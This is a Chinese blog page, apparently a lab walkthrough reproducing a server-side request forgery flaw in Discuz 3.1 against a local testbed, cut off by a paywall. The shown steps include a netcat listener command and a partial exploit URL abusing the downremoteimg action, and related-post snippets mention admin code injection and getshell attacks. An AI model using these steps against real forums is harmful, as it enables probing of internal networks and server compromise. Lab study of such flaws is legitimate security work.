Discuz-3.1 ssrf漏洞利用操作

最新推荐文章于 2024-06-26 14:01:35 发布
最新推荐文章于 2024-06-26 14:01:35 发布
阅读量548 收藏
点赞数
分类专栏: 网络安全 科技公开课程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/L18296069161/article/details/103628816
版权

渗透学习交流群:773617250,进群即可领取一套完整的学习工具,群内定期直播,可与老师互动,欢迎大家进群学习交流!感谢大家的支持!

#001 环境搭建:
 Phpstudy+win7搭建discuz漏洞环境
 把Discuz-3.1 源码拖到网站根目录,然后访问upload目录进行安装,根据提示即可
 安装完成访问一波:
在这里插入图片描述

#002 漏洞复现:
 Centos7,临时关闭防火墙
在这里插入图片描述

 开启nc监听6666端口:nc -lvp 6666
在这里插入图片描述

 查看centos7的ip
在这里插入图片描述

 利用discuz的漏洞向centos7发起一个请求:

http://192.168.136.132/discuz-ssrf/upload/forum.php?mod=ajax&action=downremoteimg&me

最低0.47元/天 解锁文章
L18296069161
关注
专栏目录
104-web漏洞挖掘之SSRF漏洞1
08-03
SSRF漏洞的本质是利用服务器作为一个代理,攻击者可以借此访问那些仅限内部网络的资源,如内部服务器、数据库或者其他敏感服务。 SSRF漏洞产生的主要原因是服务端程序设计时没有对用户提供的URL或网络请求的目标...
Discuz开源论坛_v3.1系列_Sql注入漏洞详解
weixin_60708754的博客
05-12 1293
Discuz v3.1系列版本 Sql注入全流程详解
Discuz开源论坛_v3.4系列_远程代码执行漏洞详解
weixin_60708754的博客
05-15 4552
Discuz v3.4系列 远程代码执行漏洞全流程详解
web渗透-SSRF漏洞discuz论坛网站测试
最新发布
Varin
06-26 1287
ssrf(server-side request forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,ssrf是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人)
漏洞复现】Discuz-x3.1 插件漏洞
weixin_47443077的博客
05-27 2101
Discuz-x3.1 插件漏洞 文章目录Discuz-x3.1 插件漏洞一、漏洞背景二、信息收集三、漏洞利用 一、漏洞背景 作为国内最大的社区软件及服务提供商,Comsenz旗下的 Discuz! 开发组具有丰富的 web应用程序设计经验,尤其在论坛产品及相关领域,经过长期创新性开发,掌握了一整套从算法,数据结构到产品安全性方面的领先技术。使得 Discuz! 无论在稳定性、负载能力、安全保障等方面都居于国内外同类产品领先地位。 二、信息收集 本地IIS搭建Discuz-x3.1,发现不能直接访问 进行
Discuz! X3.1 后台代码执行
zyl404的博客
12-14 756
Discuz! X3.1 后台代码执行 漏洞描述 Discuz! X3.1后台存在任意代码执行问题,要后台权限。 实验步骤 一、访问后台地址: http://域名/admin.php 账号:admin 密码:admin123 二、编辑 全局 - 站点信息 - 网站第三方统计代码 比如在这里输入 <?php phpinfo();?>然后翻到页面的最下方提交。 三、更新缓存 点击 工具 - 更新缓存 - 然后点击确定 四、点击 门户 - HTML管理 - 设置 注意专题HTML存放目录(te
分支与循环
oklying的博客
03-04 402
分支与循环 分支 if多分支 根据不同的条件做不一样的事情,但是要求条件之间存在:其中某一个条件成立了,另外的其他条件一定不会成立 语法: if 条件语句1: 代码段1 elif 条件语句2: 代码段2 elif 条件语句3: 代码段3 … else: 代码段N if score >= 90: print('A') elif score >= 80: print('B') elif score >= 60: print('C') else: print('D
31-浅谈SSRF漏洞1
08-03
SSRF(Server-Side Request Forgery)漏洞是一种网络安全问题,主要出现在服务器端,攻击者能够利用此漏洞控制服务器发起请求到特定的内部网络资源。由于这些请求通常源于服务器,它们可以绕过对外网的常规防护,...
WebLogic SSRF 及漏洞修复
11-25
SSRF漏洞通常出现在Web应用中,当应用未能正确地验证服务器响应时,攻击者可以利用这些漏洞绕过网络访问控制机制,例如防火墙。具体来说,SSRF攻击的核心在于利用应用程序本身作为跳板,向内部或外部的目标服务器...
乌云峰会猪猪侠ppt-关于SSRF
03-26
该资源是猪猪侠在2016年乌云峰会上发表演讲的PPT(已被转成PDF),内容是关于SSRF漏洞,我之前找这个找了很久,在这里分享出来,供大家参考学习,共同进步。
29 WEB漏洞-CSRF及SSRF漏洞案例讲解-附件资源
03-02
29 WEB漏洞-CSRF及SSRF漏洞案例讲解-附件资源
discuz3.1/3.2 未来科技模板
04-08
将template跟source覆盖到根目录,后台 界面 风格管理 安装启用即可
discuzx3.1
02-19
Crossday Discuz! Board(以下简称 Discuz!,中国国家版权局著作权登记号 2008SR11708 )是康盛创想(北京)科技有限公司(英文简称Comsenz)推出的一套通用的社区论坛软件系 统。作为国内最大的社区软件及服务提供商,Comsenz旗下的 Discuz! 产品,无论在功能、 稳定性、负载能力、安全保障等方面都居于国内外同类产品领先地位,是全球成熟度最高、 覆盖率最大的论坛软件系统之一。
Discuz漏洞整理.pdf
11-15
Discuz漏洞整理,基本囊括了所有已知discuz漏洞,推荐人群为:渗透测试工程师/安全研究员
Discuz x3.1 utility/convert/config.inc.php漏洞get shell
灰蜗牛
09-26 7766
Discuz x3.1 utility/convert/config.inc.php漏洞get shell i 春秋 --- 竞赛训练 -- 这不是DZ?
discuz rss全文输出
阿希的博客
06-06 2420
网上很多内容都是针对论坛forum板块的,但是今天我需要的是portal的,所以在进行了一番研究后,在此把discuz两种rss的输出修改都写出来 Discuz!门户和论坛rss地址和相关文件。 门户地址:你的网址/portal.php?mod=rss 论坛地址:你的网址/forum.php?mod=rss 对应的控制rss输出内容的文件为:/source/module/portal/...
SSRF漏洞】实战演示 超详细讲解
qinshuoyang1的博客
08-09 1813
通过SSRF漏洞的学习,我发现SSRF漏洞果然比CSRF漏洞的利用的局限性要小,并且SSRF漏洞对内网的一些应用危害比较大。所以在开发过程中,警惕大家要尽量避免产生SSRF漏洞
nc 探测端口_Discuz-3.1 ssrf漏洞利用操作(环境搭建、漏洞复现、探测端口)
weixin_39569051的博客
01-09 559
一、环境搭建:(一)Phpstudy+win7搭建discuz漏洞环境(二)把Discuz-3.1 源码拖到网站根目录,然后访问upload目录进行安装,根据提示即可(三)安装完成访问一波:二、漏洞复现:(一) Centos7,临时关闭防火墙(二)开启nc监听6666端口:nc -lvp 6666(三)查看centos7的ip(四)利用discuz漏洞向centos7发起一个请求:http://...
discuz漏洞汇总
热门推荐
hacker0ne的博客
05-05 5万+
Discuz漏洞拿服务器 路径泄露 ‘api/addons/zendcheck.php’, ‘api/addons/zendcheck52.php’, ‘api/addons/zendcheck53.php’, ‘source/plugin/mobile/api/1/index.php’, ...
SSRF漏洞利用全解析:典型手法与实战案例
本篇文章以一种类似于SQL注入技巧总结的形式,全面探讨了SSRF漏洞的原理、常见攻击步骤、利用方式、特定环境下的漏洞利用示例以及一些规避策略。 首先,了解SSRF的基本概念是关键。SSRF通常涉及以下几个方面: 1. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值